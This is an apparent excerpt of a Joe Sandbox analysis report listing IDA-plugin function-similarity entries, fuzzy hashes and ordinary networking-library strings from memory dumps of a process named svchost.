                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$}
                                                                                                                                                                                • API String ID: 909987262-2617750137
                                                                                                                                                                                • Opcode ID: 8e5f5a45e94b0213d5f229180f1abcf0a088fb2b9dcb9740730f51d7e99d0f60
                                                                                                                                                                                • Instruction ID: 0ecd271fb2b7ca41e1c0a1a962ca561721ab286b61f04a5e55406c955f1298b5
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e5f5a45e94b0213d5f229180f1abcf0a088fb2b9dcb9740730f51d7e99d0f60
                                                                                                                                                                                • Instruction Fuzzy Hash: ED51B322A0A54295DB289F28E0506BD73A0FF50BC5F948132D75D463D8FF6DEA82E640
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: %s%s%s$Couldn't set desired mode$Got a %03d response code instead of the assumed 200$LIST$NLST
                                                                                                                                                                                • API String ID: 0-3982560815
                                                                                                                                                                                • Opcode ID: 86cf9f4564031a61fb72bb604d7fbfcf215bea74e00268ee9c6f52b1ce35f903
                                                                                                                                                                                • Instruction ID: 6f63948c768154f6f02b44c4de41680f28428a6ec0a6935179f1ea8c6a866b33
                                                                                                                                                                                • Opcode Fuzzy Hash: 86cf9f4564031a61fb72bb604d7fbfcf215bea74e00268ee9c6f52b1ce35f903
                                                                                                                                                                                • Instruction Fuzzy Hash: 8451B02AB0964285FB519F5DE8406BA6791EB88BE8F4C0031DF0D47795DF3CE88A8748
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: inet_pton$SimpleString::operator=inet_ntop
                                                                                                                                                                                • String ID: (none)$Host %s:%d was resolved.$IPv4: %s$IPv6: %s$too many IP, cannot show
                                                                                                                                                                                • API String ID: 1960554822-234134439
                                                                                                                                                                                • Opcode ID: 15ddd0dd4b74631b523f4bd1e5080efb31b07ce2bd36e3d060f58fee396be1f7
                                                                                                                                                                                • Instruction ID: 00cad0b4d0f292d31ab9c8faf9d6fdece5d7f1f270e6ca99f958276abed61fa4
                                                                                                                                                                                • Opcode Fuzzy Hash: 15ddd0dd4b74631b523f4bd1e5080efb31b07ce2bd36e3d060f58fee396be1f7
                                                                                                                                                                                • Instruction Fuzzy Hash: FB516D66A1D68281FB60DB19E4507BA6791FF8CBC4F884031DB4D47686EF6CE547C708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: signal
                                                                                                                                                                                • String ID: CCG
                                                                                                                                                                                • API String ID: 1946981877-1584390748
                                                                                                                                                                                • Opcode ID: 01f8e4c4d1a19d00ad60ef520917e7cdb6b4237445d121632a71a9a355f36039
                                                                                                                                                                                • Instruction ID: d27226b85bcb93a9f3255e4fa10b6670b7ae65bfe50647b281e8467d6d08727b
                                                                                                                                                                                • Opcode Fuzzy Hash: 01f8e4c4d1a19d00ad60ef520917e7cdb6b4237445d121632a71a9a355f36039
                                                                                                                                                                                • Instruction Fuzzy Hash: 013154E1B0450E87FF6946BA44503392101AB8A33AFD58B27D97D873E5CF1DC8DD4A12
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                • Opcode ID: 1c72348b80fa8a03feaba0a4fdb223989db32960931a402a480a862eef7cb797
                                                                                                                                                                                • Instruction ID: aacee7cb4b66e12222b894a3f90a287e2a6b2cf0f13a51dd514aa6fbd31d04af
                                                                                                                                                                                • Opcode Fuzzy Hash: 1c72348b80fa8a03feaba0a4fdb223989db32960931a402a480a862eef7cb797
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F8178A1E0C34386FA50AB6EA44527A3691AF8D7C0F4C8535DB4C47796DF2CE84B8B08
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: %$/$=
                                                                                                                                                                                • API String ID: 0-2059584362
                                                                                                                                                                                • Opcode ID: 6a75f271d0d866b1365b18b9c4f74756e4e49bcea5a504f342b5786f6dd2fbb1
                                                                                                                                                                                • Instruction ID: 7ca7e28c08b0d58418e5a980c7d6476783bebfdb3e7fd4c424ad25671656edac
                                                                                                                                                                                • Opcode Fuzzy Hash: 6a75f271d0d866b1365b18b9c4f74756e4e49bcea5a504f342b5786f6dd2fbb1
                                                                                                                                                                                • Instruction Fuzzy Hash: 7AD14FA1A0ED8A4DFB619A2DC4543BD27A1AF0D7C8F4C4036DB4E865C6DF2CE946D318
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdupcallocfree
                                                                                                                                                                                • String ID: %10s %512s %u %10s %512s %u "%64[^"]" %u %u
                                                                                                                                                                                • API String ID: 1236595397-182011152
                                                                                                                                                                                • Opcode ID: b97aa135bb37330aec76bc5b787b5e82bee6e54e6af3b43c0ea78d7f8e608d84
                                                                                                                                                                                • Instruction ID: eaf4cfd3a074ca3056fde2beaffb2938e1d3e7cd381a7d5b3475673b1e0be3a4
                                                                                                                                                                                • Opcode Fuzzy Hash: b97aa135bb37330aec76bc5b787b5e82bee6e54e6af3b43c0ea78d7f8e608d84
                                                                                                                                                                                • Instruction Fuzzy Hash: 28B15E62A0CA8385EB609B6DE8902BE77A0FB487D8F490132DB5D47699DF3CD546CB04
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: application/octet-stream$k
                                                                                                                                                                                • API String ID: 0-2522224428
                                                                                                                                                                                • Opcode ID: 4e91952506f0eae345ba616ba1930951d2104a653e337e6e3ef4eb943c501235
                                                                                                                                                                                • Instruction ID: 6f552399ea1640bd111af6b0158991c86942c3437aa08bdafd271371deff89a9
                                                                                                                                                                                • Opcode Fuzzy Hash: 4e91952506f0eae345ba616ba1930951d2104a653e337e6e3ef4eb943c501235
                                                                                                                                                                                • Instruction Fuzzy Hash: 2CA12D7AA0AB4686EB658F2994507293BE5FB08B9CF1C0235CF5D46794DF3CD852C308
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: application/octet-stream$k
                                                                                                                                                                                • API String ID: 0-2522224428
                                                                                                                                                                                • Opcode ID: ff1a66919b7c2c5095e53cb024d1827e04cd41d3248687dbd227acc2504f57da
                                                                                                                                                                                • Instruction ID: 7336e419a00fe375b228eb3631097257578d19be3a293e8592f9e288c73cad72
                                                                                                                                                                                • Opcode Fuzzy Hash: ff1a66919b7c2c5095e53cb024d1827e04cd41d3248687dbd227acc2504f57da
                                                                                                                                                                                • Instruction Fuzzy Hash: 37A12D7AA0AB4686EB658F2994507292BE5FB08BDCF1C0235CF5D46798DF3CD852C308
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: application/octet-stream$k
                                                                                                                                                                                • API String ID: 0-2522224428
                                                                                                                                                                                • Opcode ID: cc45885bda30830f1b1579e9fd48d7c75a996b78bd39bfc150f603ac91116882
                                                                                                                                                                                • Instruction ID: fc83d4bd50e79277b5c8559852e0715d9fcabfec3c1219b1de6407d886f70edc
                                                                                                                                                                                • Opcode Fuzzy Hash: cc45885bda30830f1b1579e9fd48d7c75a996b78bd39bfc150f603ac91116882
                                                                                                                                                                                • Instruction Fuzzy Hash: C8A12C7AA0AB4686EB658F2994507292BE5FB08BDCF1C0235CF5D46798DF3CD852C308
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_strdupstrchr
                                                                                                                                                                                • String ID: %.*s$%sAuthorization: Digest %s$Proxy-
                                                                                                                                                                                • API String ID: 153040452-541442569
                                                                                                                                                                                • Opcode ID: 108841b4babcf9780965ea660bb9ceeeeceacc7c66ec909f0be03d1987ead663
                                                                                                                                                                                • Instruction ID: 068e2fbd187ea2c06bd56f3de3f695735f6f6913e80d55c838d59710904b535e
                                                                                                                                                                                • Opcode Fuzzy Hash: 108841b4babcf9780965ea660bb9ceeeeceacc7c66ec909f0be03d1987ead663
                                                                                                                                                                                • Instruction Fuzzy Hash: B7417B22608B8692E7519F19E8443AA77A0FB88BC0F580435EF8D47B95DF7CE847C718
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=free$_vfwprintf_l
                                                                                                                                                                                • String ID: %s: %s$%02x:$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                                                                                                                                                                                • API String ID: 2966703174-2144801519
                                                                                                                                                                                • Opcode ID: 03826d1a6ede76ba01a9c136476e7d89f0a59bccbbbaa4a45c355a17d25f5b22
                                                                                                                                                                                • Instruction ID: 75e03da0c7d685421e586ae318f8b26112bcdee141ab55e34afcce6ab3caf10f
                                                                                                                                                                                • Opcode Fuzzy Hash: 03826d1a6ede76ba01a9c136476e7d89f0a59bccbbbaa4a45c355a17d25f5b22
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E418122B08787C2FB109B6DD8945BA6761BB4C7D8F480031DF4D5769AEF6CE54B8B08
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=_vfwprintf_lfree
                                                                                                                                                                                • String ID: %s: %s$%02x:$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                                                                                                                                                                                • API String ID: 3487055449-2144801519
                                                                                                                                                                                • Opcode ID: 233db9cbd7226bbabfd774e3b862803e8fece1072195a4e84b15371bb98c54e3
                                                                                                                                                                                • Instruction ID: 84ca855d38971b291d35538c2ed9b6313e67f264486ada8e4b371c900a8583aa
                                                                                                                                                                                • Opcode Fuzzy Hash: 233db9cbd7226bbabfd774e3b862803e8fece1072195a4e84b15371bb98c54e3
                                                                                                                                                                                • Instruction Fuzzy Hash: E0416022B08787C2FB109B6DD8945BA6761BB4C7D8F480031DF4D5769AEF6CE44A8B08
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: %s socket %qd connected: [%s:%d] -> [%s:%d]$QUIC$UDP$cf_udp_connect(), open failed -> %d$cf_udp_connect(), opened socket=%qd (%s:%d)$cf_udp_connect(), opened socket=%qd (unconnected)
                                                                                                                                                                                • API String ID: 0-971666047
                                                                                                                                                                                • Opcode ID: 2b8a6c09a3854040816b7ece95e4a8e7087eb517b48badc878aebb7be0706f2e
                                                                                                                                                                                • Instruction ID: 1fb37e59bf4311b4570e2adac239ceb2e85fcf4071b42d44950357d2e5960ad7
                                                                                                                                                                                • Opcode Fuzzy Hash: 2b8a6c09a3854040816b7ece95e4a8e7087eb517b48badc878aebb7be0706f2e
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B416432A08682C6E7548F2EE4006AAB7A0F7597D4F5C4231DB9D87395DF3CE096C704
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: cr_in, rewind via fseek -> %d(%d)$cr_in, rewind via set.ioctl_func -> %d$cr_in, rewind via set.seek_func -> %d$ioctl callback returned error %d$necessary data rewind was not possible$seek callback returned error %d
                                                                                                                                                                                • API String ID: 0-2618464099
                                                                                                                                                                                • Opcode ID: 8d1de9c0d06fc13bea035880aa463714b6eb25d75f70a5124fddc38c373666fb
                                                                                                                                                                                • Instruction ID: 6363042e0622297914c63c4c3bfa431c704600abc021bf650fec6e11a16f5952
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d1de9c0d06fc13bea035880aa463714b6eb25d75f70a5124fddc38c373666fb
                                                                                                                                                                                • Instruction Fuzzy Hash: 5631B025B1C64182EB559B6EA6C47BD2352EF8CBC4F4C1035DB0E4B7A2DF6DE4868708
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
